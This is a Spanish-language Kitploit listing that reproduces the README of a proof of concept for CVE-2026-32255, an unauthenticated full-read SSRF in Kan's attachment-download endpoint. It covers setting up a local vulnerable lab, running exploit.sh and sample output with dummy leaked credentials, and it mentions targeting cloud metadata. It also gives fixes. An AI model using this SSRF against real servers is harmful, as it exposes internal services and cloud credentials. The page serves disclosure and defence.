Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-cve-2026-32255 — Este repositorio contiene una prueba de concepto (POC) para CVE-2026-32255, una vulnerabilidad de Server-Side Request Forgery (SSRF) de alta gravedad en Kan, una herramienta de gestión de proyectos de código abierto. | Kitploit
Herramientas/GitHubGitHub/koadt/poc-cve-2026-32255
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubkoadt/poc-cve-2026-32255

poc-cve-2026-32255

Este repositorio contiene una prueba de concepto (POC) para CVE-2026-32255, una vulnerabilidad de Server-Side Request Forgery (SSRF) de alta gravedad en Kan, una herramienta de gestión de proyectos de código abierto.

Ver Repositorio
214hace 6 mesesAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Kan SSRF mediante Descarga de Adjuntos (CVE-2026-32255) - Prueba de Concepto

Este repositorio contiene una prueba de concepto (POC) para CVE-2026-32255, una vulnerabilidad de Server-Side Request Forgery (SSRF) de alta severidad en Kan, una herramienta de gestión de proyectos de código abierto.

El endpoint vulnerable permite a atacantes no autenticados realizar solicitudes HTTP arbitrarias desde el servidor y leer la respuesta completa, lo que permite el acceso a servicios internos y endpoints de metadatos en la nube.

Tabla de Contenidos

  1. Detalles de la Vulnerabilidad
  2. Ejecutar la POC
  3. Usar el Script de Explotación
  4. Cómo Corregir la Vulnerabilidad
  5. Descargo de Responsabilidad

Detalles de la Vulnerabilidad

Información del CVE

  • ID del CVE: CVE-2026-32255
  • Versiones Afectadas: Kan <= 0.5.4
  • Versión Corregida: 0.5.5
  • Puntuación CVSS: 8.6 (Alta)
  • Vector CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-918 (Server-Side Request Forgery)

Descripción

El archivo apps/web/src/pages/api/download/attatchment.ts expone un endpoint GET /api/download/attatchment destinado a actuar como proxy para descargas de adjuntos desde el almacenamiento S3. El endpoint acepta un parámetro de consulta url controlado por el usuario y lo pasa directamente a fetch() en el lado del servidor sin ninguna validación ni autenticación:

const upstream = await fetch(url); // no validation on `url`

Un atacante puede proporcionar cualquier URL, lo que hace que el servidor realice una solicitud HTTP a ese destino y devuelva el cuerpo completo de la respuesta al cliente. Esto es un SSRF de lectura completa (no ciego), lo que significa que el atacante puede leer todo el contenido de la respuesta.

Impacto

  • Acceso a servicios internos no expuestos a internet
  • Lectura de endpoints de metadatos en la nube (por ejemplo, http://169.254.169.254/ en AWS/GCP)
  • Escaneo de puertos en redes internas
  • Exfiltración de datos sensibles de APIs internas

Referencias

  • NVD - CVE-2026-32255
  • Aviso de Seguridad de GitHub - GHSA-qrx8-9hc6-jvqg
  • Commit de Corrección

Ejecutar la POC

Requisitos Previos

  • Docker y Docker Compose
  • Bash
  • curl

Paso 1: Ejecutar una Instancia Vulnerable de Kan

Clona y ejecuta Kan v0.5.4 (la última versión vulnerable):

git clone --branch v0.5.4 https://github.com/kanbn/kan.git
cd kan

Configura las variables de entorno requeridas:

cat > .env <<'EOF'
NEXT_PUBLIC_BASE_URL=http://localhost:3000
BETTER_AUTH_SECRET=poc-secret-not-for-production-use
POSTGRES_URL=postgresql://kan:kan@localhost:5432/kan_db
POSTGRES_PASSWORD=kan
REDIS_URL=redis://localhost:6379
NEXT_PUBLIC_STORAGE_URL=http://localhost:9000
EOF

Nota: Si obtienes un error sobre dokploy-network, elimina las referencias a dokploy-network de docker-compose.yml (líneas 9, 130-131) y ejecuta docker compose up -d nuevamente. Esta red no es necesaria localmente.

Inicia los contenedores:

docker compose up -d

La aplicación debería estar disponible en http://localhost:3000.

Paso 2: Iniciar el Servicio Interno Simulado

En una terminal separada, inicia el servicio interno simulado incluido que simula una API interna sensible:

python3 internal-service.py

Esto inicia un servidor en el puerto 8888 que devuelve credenciales falsas, simulando un servicio que solo debería ser accesible desde la red interna. En un escenario del mundo real, este servicio estaría aislado detrás de un firewall e inaccesible desde el exterior. El SSRF permite al atacante alcanzarlo a través del servidor.

Paso 3: Ejecutar la Explotación

chmod +x exploit.sh
./exploit.sh http://localhost:3000

Usar el Script de Explotación

Uso

./exploit.sh <url-objetivo> [url-interna]
  • <url-objetivo>: URL base de la instancia de Kan (por ejemplo, http://localhost:3000)
  • [url-interna]: URL interna a obtener mediante SSRF (opcional, se detecta automáticamente desde la puerta de enlace del puente de Docker)

Ejemplo

./exploit.sh http://localhost:3000
=== CVE-2026-32255 - Kan SSRF mediante Descarga de Adjuntos ===
Objetivo: http://localhost:3000
URL interna: http://172.17.0.1:8888

[*] Comprobando si el endpoint es accesible...
[+] El endpoint es accesible (HTTP 400)

[*] Intentando SSRF a http://172.17.0.1:8888 ...
[+] VULNERABLE - El servidor obtuvo el recurso interno

Contenido filtrado:
------------------------------------------------------------
{
  "service": "internal-config-api",
  "credentials": {
    "db_host": "10.0.0.5",
    "db_user": "admin",
    "db_password": "s3cret_passw0rd!",
    "api_key": "sk-internal-4f8a2b1c9d3e7f6a5b0c8d2e1f4a7b3c"
  }
}
------------------------------------------------------------

Cómo Corregir la Vulnerabilidad

Actualizar Kan (Recomendado)

Actualiza a Kan v0.5.5 o posterior, que valida el parámetro url contra el nombre de host del endpoint S3 configurado antes de realizar el proxy de la solicitud.

Solución Alternativa: Bloquear en el Proxy Inverso

Si no puedes actualizar de inmediato, bloquea el acceso externo al endpoint vulnerable a nivel de tu proxy inverso.


Descargo de Responsabilidad

Esta prueba de concepto se proporciona solo con fines educativos y para pruebas de seguridad autorizadas. Utiliza esta herramienta únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas.

El autor no es responsable del mal uso de la información o las herramientas proporcionadas en este repositorio. El acceso no autorizado a sistemas informáticos es ilegal.


Descubierto por: kOaDT ([email protected])

Descargar herramienta